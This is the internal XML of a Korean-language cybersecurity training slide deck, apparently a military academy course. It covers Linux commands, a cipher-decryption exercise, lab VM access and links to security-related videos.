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287" r:id="rId4"/>
    <p:sldId id="383" r:id="rId5"/>
    <p:sldId id="394" r:id="rId6"/>
    <p:sldId id="381" r:id="rId7"/>
    <p:sldId id="380" r:id="rId8"/>
    <p:sldId id="382" r:id="rId9"/>
    <p:sldId id="384" r:id="rId10"/>
    <p:sldId id="373" r:id="rId11"/>
    <p:sldId id="374" r:id="rId12"/>
    <p:sldId id="375" r:id="rId13"/>
    <p:sldId id="263" r:id="rId14"/>
    <p:sldId id="260" r:id="rId15"/>
    <p:sldId id="270" r:id="rId16"/>
    <p:sldId id="271" r:id="rId17"/>
    <p:sldId id="272" r:id="rId18"/>
    <p:sldId id="273" r:id="rId19"/>
    <p:sldId id="385" r:id="rId20"/>
    <p:sldId id="274" r:id="rId21"/>
    <p:sldId id="279" r:id="rId22"/>
    <p:sldId id="280" r:id="rId23"/>
    <p:sldId id="281" r:id="rId24"/>
    <p:sldId id="282" r:id="rId25"/>
    <p:sldId id="386" r:id="rId26"/>
    <p:sldId id="387" r:id="rId27"/>
    <p:sldId id="388" r:id="rId28"/>
    <p:sldId id="389" r:id="rId29"/>
    <p:sldId id="390" r:id="rId30"/>
    <p:sldId id="391" r:id="rId31"/>
    <p:sldId id="392" r:id="rId32"/>
    <p:sldId id="393" r:id="rId33"/>
    <p:sldId id="284" r:id="rId34"/>
    <p:sldId id="285" r:id="rId35"/>
    <p:sldId id="286" r:id="rId36"/>
    <p:sldId id="355" r:id="rId37"/>
    <p:sldId id="291" r:id="rId38"/>
    <p:sldId id="288" r:id="rId39"/>
    <p:sldId id="292" r:id="rId40"/>
    <p:sldId id="293" r:id="rId41"/>
    <p:sldId id="294"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1" r:id="rId60"/>
    <p:sldId id="312" r:id="rId61"/>
    <p:sldId id="313" r:id="rId62"/>
    <p:sldId id="314" r:id="rId63"/>
    <p:sldId id="318" r:id="rId64"/>
    <p:sldId id="319" r:id="rId65"/>
    <p:sldId id="320" r:id="rId66"/>
    <p:sldId id="321" r:id="rId67"/>
    <p:sldId id="322" r:id="rId68"/>
    <p:sldId id="323" r:id="rId69"/>
    <p:sldId id="324"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6" r:id="rId100"/>
    <p:sldId id="357" r:id="rId101"/>
    <p:sldId id="358" r:id="rId102"/>
    <p:sldId id="359" r:id="rId103"/>
    <p:sldId id="360" r:id="rId104"/>
    <p:sldId id="361" r:id="rId105"/>
    <p:sldId id="362" r:id="rId106"/>
    <p:sldId id="363" r:id="rId107"/>
    <p:sldId id="364" r:id="rId108"/>
    <p:sldId id="367" r:id="rId109"/>
    <p:sldId id="368" r:id="rId110"/>
    <p:sldId id="370" r:id="rId111"/>
    <p:sldId id="372" r:id="rId112"/>
    <p:sldId id="369" r:id="rId113"/>
    <p:sldId id="376" r:id="rId114"/>
    <p:sldId id="377" r:id="rId115"/>
    <p:sldId id="378" r:id="rId116"/>
    <p:sldId id="379" r:id="rId117"/>
    <p:sldId id="371" r:id="rId118"/>
    <p:sldId id="268" r:id="rId119"/>
    <p:sldId id="365" r:id="rId120"/>
    <p:sldId id="366" r:id="rId121"/>
    <p:sldId id="296" r:id="rId122"/>
    <p:sldId id="325" r:id="rId123"/>
    <p:sldId id="290" r:id="rId1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D0CECE"/>
    <a:srgbClr val="2E75B6"/>
    <a:srgbClr val="BF9000"/>
    <a:srgbClr val="EAEAEA"/>
    <a:srgbClr val="767171"/>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0" d="100"/>
          <a:sy n="120" d="100"/>
        </p:scale>
        <p:origin x="1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2021-02-23</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2021-02-23</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2021-02-23</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2021-02-23</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2021-02-23</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2021-02-23</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2021-02-23</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2021-02-23</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2021-02-23</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2021-02-23</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2021-02-23</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2021-02-23</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5.bmp"/><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slide" Target="slide99.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10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slide" Target="slide105.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide108.xml"/></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slide" Target="slide104.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide107.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="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slide" Target="slide33.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide1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12.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image" Target="../media/image30.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide114.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50689;&#49345;/%5b2018%20&#53076;&#46300;&#44172;&#51060;&#53944;%20&#54644;&#53433;&#49884;&#50672;%20&#44277;&#47784;&#51204;%5d%20mysql%20exploit.mp4"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50689;&#49345;/%5b2018%20&#53076;&#46300;&#44172;&#51060;&#53944;%20&#54644;&#53433;&#49884;&#50672;%20&#44277;&#47784;&#51204;%5d%20Smarthome%20Hacking%20In%20Real%20World.mp4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/%5b2018%20&#53076;&#46300;&#44172;&#51060;&#53944;%20&#54644;&#53433;&#49884;&#50672;%20&#44277;&#47784;&#51204;%5d%20&#51648;&#47280;&#52286;&#44592;%20&#53356;&#47001;.mp4"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6.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.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slide" Target="slide2.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide120.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8"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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=IS3UpC121bI" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/320%20&#49324;&#51060;&#48260;&#53580;&#47084;.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5b&#50549;&#52964;&amp;&#47532;&#54252;&#53944;%5d%20&#36557;%20&#45236;&#48512;&#47581;%202&#45380;&#44036;%20&#50808;&#48512;%20&#51217;&#49549;&#8230;&#48372;&#50504;%20&#8216;&#44396;&#47693;&#8217;.mp4" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/Imitation%20Game%20-%20&#50640;&#45768;&#44536;&#47560;%20&#54644;&#46021;%20&#51109;&#47732;.mp4" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#51453;&#44592;&#51204;&#50640;%20&#50508;&#50500;&#50556;%20&#54624;%20&#50669;&#49324;,%20&#48120;&#46300;&#50920;&#51060;%20&#54644;&#51204;.mp4" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/%5b&#51088;&#47561;&#45684;&#49828;%5d%20&#51064;&#53552;&#45367;%20&#51096;%20&#50504;%20&#46104;&#45716;%20&#21271;,%20&#50612;&#46523;&#44172;%20&#49464;&#44228;%20&#44275;&#44275;%20&#54644;&#53433;&#54624;&#44620;%20_%20YTN.mp4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#54644;&#53433;%20vs%20&#54644;&#53433;%20(Hacker%20Vs%20Hacker)%20%5b&#45224;&#44284;&#48513;17%5d.mp4" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#50689;&#49345;/&#48513;&#54620;%20&#53076;&#47196;&#45208;%20&#51228;&#51312;&#49324;%20&#44277;&#44201;.mp4" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide121.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4.b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22.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide26.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13.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide29.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide23.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide28.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1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13.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23.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21.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slide" Target="slide3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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide104.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide99.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide35.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72.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide37.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide46.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide66.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide34.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide36.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide95.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide44.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide59.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide41.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide89.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide52.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide39.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide50.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8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2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.gif"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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gif"/><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68.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.gif"/><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9.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8.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5.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image79.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bmp"/></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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image86.gif"/><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gif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image83.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide65.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4.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97.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.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99.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7.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02.gif"/><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09.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image108.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image107.bmp"/></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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image115.bmp"/><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78.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8.bmp"/><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24.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image123.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image122.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide8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3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.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bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image126.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide84.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image129.bmp"/><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8.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image125.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image137.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36.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image135.png"/><Relationship Id="rId4"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43.bmp"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image138.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image142.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41.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image140.bmp"/><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3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image144.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image148.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47.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image146.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image145.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image154.gif"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image149.bmp"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image153.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52.bmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image151.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image150.bmp"/></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57.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image156.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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6.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161.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9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64.bmp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image163.bmp"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide99.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100.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide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805578557"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="1476757"/>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VM player</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>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VM </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>다운로드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NIS(Network Information Service)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서비스는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있도록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10.10.1.166(NIS Server) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>접속 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(PW : toor)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    # ssh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164892736"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3089260" y="2678454"/>
          <a:ext cx="6013480" cy="2216785"/>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소프트웨어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윈도우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대칭키</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대칭키</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윈도우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공개키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공개키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Openssl</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key=3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dirty="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“cipher.txt”, “decryption.py”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“cipher.txt”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“decryption.py.py”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“decryption.py.py”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decryption.py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with liberation, the Naval Academy was opened to foster elite naval officers who will protect the seas of the motherland by Admiral Son Won-il and other marine pioneers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>The elite guardianships produced by the Naval Academy have dedicated themselves to their motherland, and are still striving to raise the status of Korea in all parts of the world.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Like the adage that those who rule the sea dominate the world, we will meet the expectations of the nation and the people by nurturing talented people who protect the sea, which is our place of living and the channel of national prosperity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>We look forward to your continued interest and support for our Naval Academy.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“cipher.txt”, “decryption.py”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“cipher.txt”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“decryption.py.py”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“decryption.py.py”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decryption.py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After receiving an order from the Senate to dismantle all of the corps in Gaul and appear in Rome, he led the corps to cross the Rubicon River. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>At the time, the Rubicon River was the border between Rome and the provinces, and it was not allowed to cross the river with troops. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Caesar said his dice were thrown as he crossed this river.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2755841180"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2433099" y="2117820"/>
          <a:ext cx="8213698" cy="1325564"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3681454">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4532244">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file"/>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65058">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python_test.py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python_test.py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python_test.py”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dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>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3514888310"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2067339" y="2014453"/>
          <a:ext cx="8213698" cy="3275070"/>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gridCol w="747423">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3549310020"/>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지식</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유머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전쟁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유머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757048151"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1329855" y="1690688"/>
          <a:ext cx="9532293" cy="4678807"/>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시스템 보안로그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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>R-command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Tshark</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, Wireshark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디버거</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(GDB)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레이스 컨디션</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>(Race 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4"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6415155" y="1690688"/>
            <a:ext cx="3977200" cy="4971502"/>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실습실 사진</a:t>
            </a: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5209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53959368"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1694953" y="1791679"/>
          <a:ext cx="8802093" cy="4675508"/>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grep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echo</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head/tail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585672589"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4451847" y="2813240"/>
          <a:ext cx="3288306" cy="172427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99385961"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1694953" y="1791679"/>
          <a:ext cx="8802093" cy="467208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grep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echo</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7768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6F81AA95-3EE1-4610-BE09-C37E81D839A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home]# cd /export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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>err.log  err_url.txt  home  repo</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2017 home</a:t>
              </a:r>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20:17 repo</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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>.  ..  err.log  err_url.txt  home  repo</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–h  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>: K, M, G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dirty="0"/>
                <a:t>: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>atime</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>접근 시간</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–lc  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>:  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>ctime</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0"/>
                <a:t>변경 시간</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–al e*.g  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="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&gt; file.txt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3" name="화살표: 오른쪽 12">
            <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{982B7F67-ED70-4529-B941-47D2551C8E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/test</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mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -p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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/test1/test2</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mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> -p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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="95000"/>
                      <a:lumOff val="5000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>/test1/test2</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-m 775 test3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-m 777 test4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15:03 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test3</a:t>
              </a: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15:03 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="7030A0"/>
                  </a:solidFill>
                </a:rPr>
